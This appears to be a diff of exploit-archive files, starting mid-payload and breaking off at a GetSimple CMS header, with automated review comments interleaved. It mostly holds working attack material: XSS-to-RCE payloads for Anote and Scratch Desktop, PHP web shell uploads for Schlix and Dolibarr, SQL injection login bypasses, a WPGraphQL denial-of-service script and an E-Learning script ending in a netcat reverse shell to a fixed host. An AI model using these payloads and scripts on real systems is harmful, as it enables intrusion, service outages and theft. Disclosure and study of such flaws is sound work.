,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,10
1,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)


@ -0,0 +1,33 @@
# Exploit Title: Anote 1.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/AnotherNote/anote
# Version: 1.0
# Tested on: Linux, MacOs
# Software Description:
A simple opensource note app support markdown only, anote allows you to view and edit files markdown has a friendly interface for paste image paste html (includes retrieve image locally) export sale file with images
export PDF support tray menu quick note (evernote inspired)
cmd + v default will convert html.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/mFMDOuu
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
{"bookId":"ddpQIk8Fhmoyr2wK","available":true,"_id":"VDJCb2CaIHObFXlw","createdAt":{"$$date":1620076429201},"updatedAt":{"$$date":1620076529398},"title":"XSS TO RCE","content":"[<audio src=x onerror=writeln(String.fromCharCode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http://)"}
{"$$indexCreated":{"fieldName":"updatedAt","unique":false,"sparse":false}}
{"$$indexCreated":{"fieldName":"bookId","unique":false,"sparse":false}}


@ -0,0 +1,79 @@
# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
# Date: 21.05.2021
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: 2.2.6-6
# Tested On: Ubuntu 20.04 (Firefox)
############################################################################################################
Summary: An authorized user can upload a file with a .phar extension
to a path of his choice and control the content as he wishes. This causes RCE vulnerability.
For full technical details and source code analysis:
https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.
############################################################################################################
PoC:
1-) Login to admin panel with true credentials and go to "Tools ->
Mediamanager" menu from left side.
2-) Click the "Upload File" and upload a file and catch the request with Burp.
3-) Change the "uploadstartpath", "filename" and file content as follows.
# Request
POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
Host: vulnerable-server
Content-Length: 846
X-Schlix-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
Accept: */*
Origin: http:// <http://10.211.55.4/>vulnerable-server
Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager
<http://10.211.55.4/schlix/admin/app/core.mediamanager>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;
schlix-your-cookie;__atuvc=5%7C20;
schlix_frontendedit_control_showblock=-2;
schlix_frontendedit_control_showhide=-2;
schlix_frontendedit_control_showdoc=-2
Connection: close
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="_csrftoken"
{your_csrf_token}
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="uploadstartpath"
/media/docs/....//....//....//....//system/images/avatars/large/
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"
<?PHP system($_GET['rce']);?>
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__total_file_size"
0
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__max_file_count"
20
------WebKitFormBoundarybllOFLruz1WAs7K2--
4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".
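Review bot: the `uploadstartpath` value `/media/docs/....//....//....//....//system/images/avatars/large/` shows the server strips `../` once instead of canonicalizing the path, and the `filedata[]` part shows `.phar` is accepted as an upload type; the file has no mitigation section, so add one: resolve the final upload path and reject anything outside the media root, and allowlist extensions with `.phar` treated like `.php`. The `Origin` and `Referer` lines also carry mail-client autolink residue (`<http://10.211.55.4/>`) that is not part of the request and should be removed.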


@ -0,0 +1,39 @@
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
Example of regular cross-site scripting (XSS):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>
The example above launches cmd.exe (Command Prompt) on Windows.
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
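Review bot: the metadata disagrees with the body: the title says "Scratch Desktop 3.17", the `# Version:` field says 3.10.2 and the `# Software Link:` points at the 3.10.2 installer, while the text says the issue affects versions prior to 3.17.1 and scratch-svg-renderer before 0.2.0-prerelease.20201019174008; make the Version field state the affected range and note that 3.10.2 is the version tested. A sentence on why omitting `viewBox` changes the code path would help, as would stating that the RCE variant additionally depends on `require('electron')` being reachable from the renderer, a hardening point separate from fixing the SVG handling in scratch-svg-renderer.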


@ -0,0 +1,42 @@
# Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
# Date: 4/07/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/
# Version: 6.5 and Below
# CVE : CVE-2021-31682
--Summary--
The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized.
Automated Logic
https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
--Affects--
- WebCTRL OEM
- Versions 6.5 and prior
--Details--
The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues including but not limited to:
- Hijacking a user's session
- Using XSS payloads to capture input (keylogging)
-- Proof of Concept --
The following URL parameter was impacted and can be exploited with the sample payload provided below:
- https://example.com/index.jsp?operatorlocale=en/><script>alert("xss")</script>
--Mitigation--
Sanitize any user controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.
--Timeline--
- 4/07/2021: XSS Vulnerability was discovered and documented.
- 4/17/2021: A temporary CVE identifier was requested by MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90 day disclosure timeline was established in the initial communication.
- 7/23/2021: MITRE Assigns CVE ID CVE-2021-31682 to the vulnerability.
- 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product.
- 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate impacted list of products when full disclosure occurs. Automate Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MTIRE.
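Review bot: the "--Details--" paragraph opens with the "--Summary--" sentence repeated verbatim; cut one copy. In the timeline, "Automate Logic" and "MTIRE" should read "Automated Logic" and "MITRE". The mitigation would be more precise as "HTML-encode the reflected `operatorlocale` value on output, and validate it against the set of supported locales" rather than "sanitize", since the PoC shows the raw parameter being reflected into page markup.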

55
exploits/php/dos/49807.py Executable file

@ -0,0 +1,55 @@
# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
# Author: Dolev Farhi
# Date: 2021-04-12
# Vendor Homepage: https://www.wpgraphql.com/
# Version: 1.3.5
# Tested on: Ubuntu
"""
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""
import sys
import requests
def usage():
print('* WordPress GraphQL 1.3.5 Denial of Service *')
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
print('python {} http://site.com 10000 100'.format(sys.argv[0]))
sys.exit(1)
if len(sys.argv) < 4:
print('Missing arguments!')
usage()
def wpgql_exists():
try:
r = requests.post(WORDPRESS_URL, json='x')
if 'GraphQL' in r.json()['errors'][0]['message']:
return True
except:
pass
return False
# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])
if wpgql_exists is False:
print('Could not identify GraphQL running at "/index.php?graphql"')
sys.exit(1)
queries = []
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
for _ in range(0, CHAINED_REQUESTS):
queries.append(query)
r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())
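Review bot: `if wpgql_exists is False:` compares the function object to `False` instead of calling it, so the check never fires and the "Could not identify GraphQL" branch is dead code; the bare `except:` inside `wpgql_exists()` also swallows every error, including the `KeyError` when the response has no `errors` key. The header names the amplification (field duplication multiplied by batched queries) but not the controls that stop it: a cap on the number of operations per batched request, a query depth or complexity limit, and a request body size limit at the web server, which is what a WPGraphQL deployment should be checked for.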

93
exploits/php/webapps/49434.py Executable file

@ -0,0 +1,93 @@
# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
# Exploit Author: Himanshu Shukla & Saurav Shukla
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
# Version: 1.0
# Tested On: Kali Linux + XAMPP 7.4.4
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution
#Step 1: run the exploit in python with this command: python3 exploit.py
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23
#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444
#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444
#Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter.
import requests
print('########################################################')
print('## E-LEARNING SYSTEM 1.0 ##')
print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##')
print('########################################################')
print('Author - Himanshu Shukla & Saurav Shukla')
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""}
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if("You login as Administrator." in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)
#Creating a PHP Web Shell
phpshell = {
'file':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/x-php',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''}
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)
shell_upload = True if("window.location='index.php'" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
print("[*]Please Input Reverse Shell Details")
LHOST=input("[*]LHOST : ")
LPORT=input("[*]LPORT : ")
print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT)
input('[*]Hit Enter if your netcat shell is ready. ')
print('[+]Deploying The Web Shell...')
#Executing The Webshell
e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)
exit()
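Review bot: the final `s.get(...)` hardcodes the author's lab addresses (`http://192.168.1.5/caiwl/...`, `nc 192.168.1.2 9999`), so the `LINK`, `LHOST` and `LPORT` values collected from the user never reach that request and the six-step header does not describe what the script does; the login POST is also issued twice and the `PHPSESSID` value is hard-coded. For the advisory itself, the `'or 1 or'` string in `user_email` and the unrestricted `.php` upload through `controller.php?action=add` are two separate flaws, and the mitigation for each (parameterized queries for the login; an extension allowlist and a non-executable upload directory for lesson files) should be stated.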

exploits/php/webapps/49462.py Executable file

@ -0,0 +1,58 @@
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.
import requests
YELLOW = '\033[33m' # Yellow Text
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('********************************************************')
print('** LIBRARY SYSTEM 1.0 **')
print('** AUTHENTICATION BYPASS USING SQL INJECTION **')
print('********************************************************')
print('Author - Himanshu Shukla')
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
LINK=input("Enter URL of The Vulnarable Application : ")
#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies)
r=s.post(LINK+'login.php', data=values, cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)
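Review bot: the success test on L1818 defaults to success: `logged_in = True if not("Student not found" in r.text) else False` reports a bypass for any response that merely lacks that string, including a 404 from a mistyped base URL or the reply of a build that is not vulnerable, so check for a positive marker of the student area (or the redirect and status code) instead, and once a marker is chosen the expression reduces to a plain `in` test. L1815-L1816 post the same form twice with only the second reply inspected; remove the duplicate or explain why two requests are needed. The PHPSESSID on L1810 is a hard-coded value the server will not recognise, and the session object created on L1808 already handles cookies. The `'or 1 or'` value on L1814 shows the `student` field is concatenated into the login query; a prepared statement is the fix, and the usage notes on L1787-L1790 would read better as a short usage block than as bare comments inside the header.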


@ -0,0 +1,19 @@
# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
# Vulnerable parameters: 'Comments / Special Instructions :'
# Payload used:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
# POC: in the same page where we injected payload refresh the page.
# You will see your Javascript code (XSS) executed.
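Review bot: the payload on L1842-L1843 is a single-line polyglot in the original but is shown broken across two lines, with `)//%0D%0A...` starting the second, so a reader who copies it gets a different string; mark where the line break is not part of the payload or keep it on one line. The file names the vulnerable script and parameter but shows no request and does not say where the stored comment is rendered, so the steps on L1844-L1845 cannot be reproduced from the file alone. For the maintainers, the fix is to encode the comment for its HTML context on output (htmlspecialchars with ENT_QUOTES) rather than to extend input filtering, which this polyglot is built to evade.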


@ -0,0 +1,60 @@
# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: P.Naveen Kumar
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software : Web Based Quiz System
# Version : 1.0
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Persistent/Stored XSS
# Tested on: Windows 10 Pro
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in registration form in name parameter affected from this vulnerability.
# payload: <script>alert(document.cookie)</script>
# HTTP POST request
POST http://localhost:8080/quiz/register.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
Content-Length: 690
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/quiz/register.php
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
Upgrade-Insecure-Requests: 1
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="name"
<script>alert(document.cookie)</script>
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="email"
test123@gmail.com
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="password"
Hacker
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="college"
hello
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="submit"
-----------------------------283640616528311462411171270636--
POC:
# go to url http://localhost:8080/quiz/register.php
# then you have to fill the above payload in name/username parameter
# then fill the remaining details
# then click submit
# then login to user account
# then attempt any one quiz after attempting go to ranking section then
# you can see xss pop up there..!
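Review bot: the multipart body on L1877-L1891 is not valid as shown: each part needs an empty line between its `Content-Disposition` header and its value, and the `name="submit"` part on L1890 has no value line before the closing boundary, so the Content-Length of 690 on L1871 no longer matches the body either. Either restore the blank lines or note that headers and values were collapsed in transcription. The browser headers on L1866-L1869 and L1873-L1876 (User-Agent, Accept-*, Connection, Upgrade-Insecure-Requests) add nothing to the PoC and could be trimmed to Host, Content-Type and Cookie. On the remediation side, `name` is stored unescaped and rendered on the ranking page, so escaping on output fixes it, and because the payload reads `document.cookie`, an HttpOnly flag on PHPSESSID limits what a stored script can exfiltrate even before that fix lands.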

exploits/php/webapps/49711.py Executable file

@ -0,0 +1,216 @@
# Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
# Date: 16/06/2020
# Exploit Author: Andrea Gonzalez
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: Prior to 11.0.5
# Tested on: Debian 9.12
# CVE : CVE-2020-14209
#!/usr/bin/python3
# Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess. If no option is selected, all 3 methods are tested.
import re
import sys
import random
import string
import argparse
import requests
import urllib.parse
from urllib.parse import urlparse
session = requests.Session()
base_url = "http://127.0.0.1/htdocs/"
documents_url = "http://127.0.0.1/documents/"
proxies = {}
user_id = -1
class bcolors:
BOLD = '\033[1m'
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def printc(s, color):
print(f"{color}{s}{bcolors.ENDC}")
def read_args():
parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). If no method is chosen, every method is tested.')
parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.')
parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).')
parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").')
parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.')
parser.add_argument('--extension-bypass', dest='fbypass', action='store_true',
default=False,
help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.')
parser.add_argument('--file-renaming', dest='frenaming', action='store_true',
default=False,
help='A PHP script is uploaded and .php extension is added using file renaming function.')
parser.add_argument('--htaccess', dest='htaccess', action='store_true',
default=False,
help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.')
required = parser.add_argument_group('required named arguments')
required.add_argument('-u', '--user', help='Username', required=True)
required.add_argument('-p', '--password', help='Password', required=True)
return parser.parse_args()
def error(s, end=False):
printc(s, bcolors.HEADER)
if end:
sys.exit(1)
"""
Returns user id
"""
def login(user, password):
data = {
"actionlogin": "login",
"loginfunction": "loginfunction",
"username": user,
"password": password
}
login_url = urllib.parse.urljoin(base_url, "index.php")
r = session.post(login_url, data=data, proxies=proxies)
try:
regex = re.compile(r"user/card.php\?id=(\d+)")
match = regex.search(r.text)
return int(match.group(1))
except Exception as e:
#error(e)
return -1
def upload(filename, payload):
files = {
"userfile": (filename, payload),
}
data = {
"sendit": "Send file"
}
headers = {
"Referer": base_url
}
upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies)
def delete(filename):
data = {
"action": "confirm_deletefile",
"confirm": "yes",
"urlfile": filename
}
headers = {
"Referer": base_url
}
delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
session.post(delete_url, headers=headers, data=data, proxies=proxies)
def rename(filename, new_filename):
data = {
"action": "renamefile",
"modulepart": "user",
"renamefilefrom": filename,
"renamefileto": new_filename,
"renamefilesave": "Save"
}
headers = {
"Referer": base_url
}
rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
session.post(rename_url, headers=headers, data=data, proxies=proxies)
def test_payload(filename, payload, query, headers={}):
file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query))
r = session.get(file_url, headers=headers, proxies=proxies)
if r.status_code != 200:
error("Error %d %s" % (r.status_code, file_url))
elif payload in r.text:
error("Non-executable %s" % file_url)
else:
printc("Payload was successful! %s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN)
return True
return False
def get_random_filename():
return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
def upload_executable_file_php(payload, query):
php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"]
random_filename = get_random_filename()
b = False
for extension in php_extensions:
filename = random_filename + extension
upload(filename, payload)
if test_payload(filename, payload, query):
b = True
return b
def upload_executable_file_ssi(payload, command):
filename = get_random_filename() + ".shtml"
upload(filename, payload)
return test_payload(filename, payload, '', headers={'ACCEPT': command})
def upload_and_rename_file(payload, query):
filename = get_random_filename() + ".php"
upload(filename, payload)
rename(filename + ".noexe", filename)
return test_payload(filename, payload, query)
def upload_htaccess(payload, query):
filename = get_random_filename() + ".noexe"
upload(filename, payload)
filename_ht = get_random_filename() + ".htaccess"
upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n")
delete(".htaccess")
rename(filename_ht, ".htaccess")
return test_payload(filename, payload, query)
if __name__ == "__main__":
args = read_args()
base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/'
documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/")
documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/'
user = args.user
password = args.password
payload = "<?php system($_GET['cmd']) ?>"
payload_ssi = '<!--#exec cmd="$HTTP_ACCEPT" -->'
command = args.cmd
query = "cmd=%s" % command
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
user_id = login(user, password)
if user_id < 0:
error("Login error", True)
printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN)
print('-' * 30)
if not args.fbypass and not args.frenaming and not args.htaccess:
args.fbypass = args.frenaming = args.htaccess = True
if args.fbypass:
printc("Trying extension-bypass method\n", bcolors.BOLD)
b = upload_executable_file_php(payload, query)
b = upload_executable_file_ssi(payload_ssi, command) or b
if b:
printc("\nextension-bypass was successful", bcolors.OKBLUE)
else:
printc("\nextension-bypass was not successful", bcolors.WARNING)
print('-' * 30)
if args.frenaming:
printc("Trying file-renaming method\n", bcolors.BOLD)
if upload_and_rename_file(payload, query):
printc("\nfile-renaming was successful", bcolors.OKBLUE)
else:
printc("\nfile-renaming was not successful", bcolors.WARNING)
print('-' * 30)
if args.htaccess:
printc("Trying htaccess method\n", bcolors.BOLD)
if upload_htaccess(payload, query):
printc("\nhtaccess was successful", bcolors.OKBLUE)
else:
printc("\nhtaccess was not successful", bcolors.WARNING)
print('-' * 30)
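Review bot: the shebang on L1914 is not the first line of the file, so it is an ordinary comment and the script will not run via `./49711.py`; move it above the header block. `upload_htaccess` (L2049-L2056) deletes the target's existing `.htaccess` on L2054 and replaces it with an attacker-controlled one, and nothing restores it; the `delete` helper exists but none of the methods remove the files they upload (the extension loop on L2034-L2038 leaves up to ten files behind), so add a cleanup pass or at least document the side effects next to the `--htaccess` help text. `test_payload` on L2017-L2027 treats any 200 whose body does not echo the source as success, so a 200 error page would also count; match on the expected command output instead. `login` on L1974-L1980 catches every exception and returns -1 with the diagnostic commented out on L1979, which hides a wrong base URL behind a generic "Login error". Since the header names 11.0.5 as the fixed version for CVE-2020-14209, a verifier should exercise all three methods against a patched build rather than stop at the first success, because each one targets a different check.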

exploits/php/webapps/49726.py Executable file

@ -0,0 +1,125 @@
# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: March 29th, 2021
# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/
# Version: v3.3.16
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
# Vulnerability Description:
